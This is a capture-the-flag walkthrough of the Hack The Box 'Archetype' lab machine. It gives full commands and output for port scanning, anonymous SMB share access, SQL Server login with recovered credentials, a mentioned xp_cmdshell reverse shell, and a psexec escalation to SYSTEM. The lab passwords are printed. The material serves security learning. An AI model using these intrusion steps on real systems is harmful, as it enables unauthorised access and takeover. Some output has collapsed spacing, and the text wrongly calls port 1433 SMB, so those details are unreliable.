They will provide official walkthroughs for each 9 machines. As I think it will be very helpfull for noob to understand the platform, techniques and more about HTB. And when it comes to noob, no one is here to find just zero-day vulnerabilities. So from my perspective, it's fine to read each and every walkthroughs provided by HTB and others to understand by yourself. "Walkthroughs are the teachers".
Enough talks 🥱, let's start to hack. 🐱💻
Disclaimers: No flags (user/root) are shown in this writeup (as usual in writeups), so follow the procedures to grab the flags! 🐱👤
00. Start Machine …
To start machine, Just click "Join Machine".
Then you can see the IP address for that machine. usually it is 10.10.10.27 🤠
Before going to enumeration steps we can simply ping to the IP address and check our VPN connection and whether machine is alive. Sometimes machines might "Disable" ping requests from passing through the firewall. But in most case ping will be a success!
-n : Never do DNS resolution
-vv : Extra verbosity
--open : Output only open ports
-p- : Full TCP ports range (65535)
-T4 : Aggressive (4) speeds scans; assumes you are on a reasonably fast and reliable network
Here is the output 👇
rootin ~/Documents/HackThebox/Archetype 🐍 v3.9.2⚡❯ nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.27Starting Nmap 7.91 ( https://nmap.org ) at2021-04-1519:15+0530Initiating Ping Scan at19:15Scanning 10.10.10.27 [4 ports]Completed Ping Scan at19:15, 0.27s elapsed (1 total hosts)Initiating SYN Stealth Scan at19:15Scanning 10.10.10.27 [65535 ports]Discovered open port 139/tcpon10.10.10.27Discovered open port 445/tcpon10.10.10.27Discovered open port 135/tcpon10.10.10.27Discovered open port 49669/tcpon10.10.10.27SYN Stealth Scan Timing: About 7.87% done; ETC: 19:21 (0:06:03 remaining)SYN Stealth Scan Timing: About 8.21% done; ETC: 19:27 (0:11:22 remaining)Discovered open port 5985/tcpon10.10.10.27SYN Stealth Scan Timing: About 42.06% done; ETC: 19:18 (0:02:05 remaining)Discovered open port 47001/tcpon10.10.10.27Discovered open port 49666/tcpon10.10.10.27SYN Stealth Scan Timing: About 64.67% done; ETC: 19:18 (0:01:06 remaining)Discovered open port 49667/tcpon10.10.10.27Discovered open port 1433/tcpon10.10.10.27Discovered open port 49665/tcpon10.10.10.27Discovered open port 49664/tcpon10.10.10.27Discovered open port 49668/tcpon10.10.10.27Completed SYN Stealth Scan at19:17, 172.44s elapsed (65535 total ports)Nmap scan report for10.10.10.27Host is up, received echo-reply ttl 127 (0.67s latency).Scanned at2021-04-1519:15:06+0530for 173sNot shown: 65523 closed portsReason: 65523 resetsPORT STATESERVICE REASON135/tcpopen msrpc syn-ack ttl 127139/tcpopen netbios-ssn syn-ack ttl 127445/tcpopen microsoft-ds syn-ack ttl 1271433/tcpopen ms-sql-s syn-ack ttl 1275985/tcpopen wsman syn-ack ttl 12747001/tcpopen winrm syn-ack ttl 12749664/tcpopen unknown syn-ack ttl 12749665/tcpopen unknown syn-ack ttl 12749666/tcpopen unknown syn-ack ttl 12749667/tcpopen unknown syn-ack ttl 12749668/tcpopen unknown syn-ack ttl 12749669/tcpopen unknown syn-ack ttl 127Readdata files from: /usr/bin/../share/nmapNmap done: 1 IP address (1 host up) scanned in172.86secondsRaw packets sent: 102404 (4.506MB) | Rcvd: 93270 (3.731MB)
I have some tricky bash script to get all open ports as bash variable call "ports". Somehow it will be helpful later. 😎
Yes, we can simply combine those two lines into one. But I need to see results quickly. That's why I divide it into two parts. If you want it in one line, you can use
Here we can see some * (Interesting) ports. others can be avoid.
01.2 Run Nmap Scripting Engine
To get the best result we can run the Nmap Scripting Engine for all open ports. Now we know all open ports so that we can point out and run the script engine as fast as possible.
Most of the case this will be end up an error because of $ports variable. This is not the right time to fix it so if you get any error, run the command without $ports variable and point out all ports.
rootin ~/Documents/HackThebox/Archetype 🐍 v3.9.2⚡❯ nmap -sV -sC -oN DetailPorts.nmap -p 135,139,455,143310.10.10.27Starting Nmap 7.91 ( https://nmap.org ) at2021-04-1519:38+0530Nmap scan report for10.10.10.27Host is up (0.52s latency).PORT STATESERVICEVERSION135/tcpopen msrpc Microsoft Windows RPC139/tcpopen netbios-ssn Microsoft Windows netbios-ssn455/tcp closed creativepartnr1433/tcpopen ms-sql-s Microsoft SQLServer201714.00.1000.00; RTM| ms-sql-ntlm-info:| Target_Name: ARCHETYPE| NetBIOS_Domain_Name: ARCHETYPE| NetBIOS_Computer_Name: ARCHETYPE| DNS_Domain_Name: Archetype| DNS_Computer_Name: Archetype|_ Product_Version: 10.0.17763| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback| Not valid before: 2021-04-15T14:30:06|_Not valid after: 2051-04-15T14:30:06|_ssl-date: 2021-04-15T14:30:34+00:00; +21m39s from scanner time.Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:|_clock-skew: mean: 21m39s, deviation: 0s, median: 21m38s| ms-sql-info:| 10.10.10.27:1433:| Version:| name: Microsoft SQLServer2017 RTM| number: 14.00.1000.00| Product: Microsoft SQLServer2017| Service pack level: RTM| Post-SP patches applied: false|_ TCP port: 1433|_smb2-security-mode: SMB: Couldn't find a NetBIOS name that works for the server. Sorry!|_smb2-time: ERROR: Script execution failed (use -d to debug)Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 29.24 seconds
Now we know the OS is Windows (Microsoft SQL Server 2017 RTM) and it has SMB (1433) port open. And lets enumerate further. Remember enumerating is the key! 🔑
01.3 List all available shares
So here it has smb (1433) port open. I used smbclient to list out all the available shares as anonymous user.
sudo smbclient -N -L 10.10.10.27
-N : Don't ask for a password
-L : Get a list of shares available on a host
Here is output 👇
rootin ~/Documents/HackThebox/Archetype 🐍 v3.9.2⚡❯ sudo smbclient -N -L 10.10.10.27 Sharename Type Comment--------- ---- -------ADMIN$ DiskRemoteAdmin backups Disk C$ DiskDefault share IPC$ IPC Remote IPCSMB1 disabled-- no workgroup available
Here we got something very interesting right? There is only single share ‘backups’ accessible with no passwords. so let's try to access it and see what's inside.😎😋
smbclient -N \\\\10.10.10.27\\backups\\
So now we are done with SMB shell and there is a file called ‘prod.dtsConfig'. so let's download it.
rootin ~/Documents/HackThebox/Archetype 🐍 v3.9.2⚡❯ smbclient -N \\\\10.10.10.27\\backups\\Try"help"toget a list of possible commands.smb: \> dir . D 0 Mon Jan 2017:50:572020 .. D 0 Mon Jan 2017:50:572020 prod.dtsConfig AR 609 Mon Jan 2017:53:02202010328063 blocks of size4096. 8203982 blocks availablesmb: \>get prod.dtsConfiggetting file \prod.dtsConfig of size609as prod.dtsConfig (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)smb: \>
smb: \> dir : List all directories
smb: \> get <file-name> : Download file
Now we can open prod.dtsConfig file and yeah that ‘prod.dtsConfig’ file contains a SQL connection string, containing credentials for the local Windows user ARCHETYPE\sql_svc 🥂.
Now we have credentials, Let's try connecting to the SQL Server using Impacket's mssqlclient.py
Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch, as well as parsed from raw data, and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library.
Now we can use the IS_SRVROLEMEMBER function to check whether the current SQL user has sysadmin (highest level) privileges on the SQL Server.
rootin ~/Documents/HackThebox/Archetype 🐍 v3.9.2⚡❯ python3 mssqlclient.py ARCHETYPE/sql_svc:M3g4c0rp123@10.10.10.27-windows-authImpacket v0.9.22- Copyright 2020 SecureAuth Corporation[*] Encryptionrequired, switching to TLS[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192[*] INFO(ARCHETYPE): Line1: Changed database context to'master'.[*] INFO(ARCHETYPE): Line1: Changed language setting to us_english.[*] ACK: Result: 1- Microsoft SQLServer (1403232)[!] Press help for extra shell commandsSQL>SELECTIS_SRVROLEMEMBER ('sysadmin')-----------1SQL>
According to the return value (1 = login is a member of role.) yes we have highest privileges.😁 This will allow us to enable xp_cmdshell and gain RCE on the host.
Check below awesome blog posts to understand that trick.
Now time to get reverse shell. Save above powershell script as anyname.ps1 (here I use script.ps1) and power up mini webserver. I'm a very lasy man you know 🙄 so here I use updog instead of typing long shit in python 😑
Updog is a replacement for Python's SimpleHTTPServer. It allows uploading and downloading via HTTP/S, can set ad hoc SSL certificates and use HTTP basic auth.
To listen the connection, I always use the swiss army knife (netcat) tool. personally I do not like to get shell through multi handler (metasploit). Trust me, using netcat tool you can learn a lot of things beyond metaspolit. 👽
I divided up my terminal up to 3 parts using Tmux multiplexer.
Woooh!!! We got our shell. 💀 A shell is received as sql_svc, and we can get the user.txt on their desktop.
04. Privilege Escalation …
To escalate privileges we can run different tools. By the way, before run any tool there are some steps that you need to run to enumerate some information. I will be showing you one by one in each walkthroughs.
Did you remember? now we are in service account called sql_svc. It's good practice to check recently accessed files/executed commands (Keep in mind as good practice). Mostly (default) our console history will be saved in C:\Users\<account_name>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt . Now you understand what our next step is.
Right, Let's check above file using type command.
type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
Here is the output 👇
PS C:\Users\Administrator>type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txtnet.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!exitPS C:\Users\Administrator>
Oh no no no noooo.. You see?
The backup share is mapped with admin credentials. Remember if you saw something like this. ready to launch Impacket's psexec.py script.
rootin ~/Documents/HackThebox/Archetype 🐍 v3.9.2⚡❯ python3 /usr/share/doc/python3-impacket/examples/psexec.py administrator:MEGACORP_4dm1n\!\!@10.10.10.27Impacket v0.9.22- Copyright 2020 SecureAuth Corporation[*] Requesting shares on10.10.10.27.....[*] Found writable share ADMIN$[*] Uploading file gZiCFMKg.exe[*] Opening SVCManager on10.10.10.27.....[*] Creating service FuWR on10.10.10.27.....[*] Starting service FuWR.....[!] Press help for extra shell commandsMicrosoft Windows [Version 10.0.17763.107](c) 2018 Microsoft Corporation. All rights reserved.C:\Windows\system32>whoamint authority\systemC:\Windows\system32>
Finally we have Administrator Privileges. 👌 Now we can access the flag on the administrator desktop.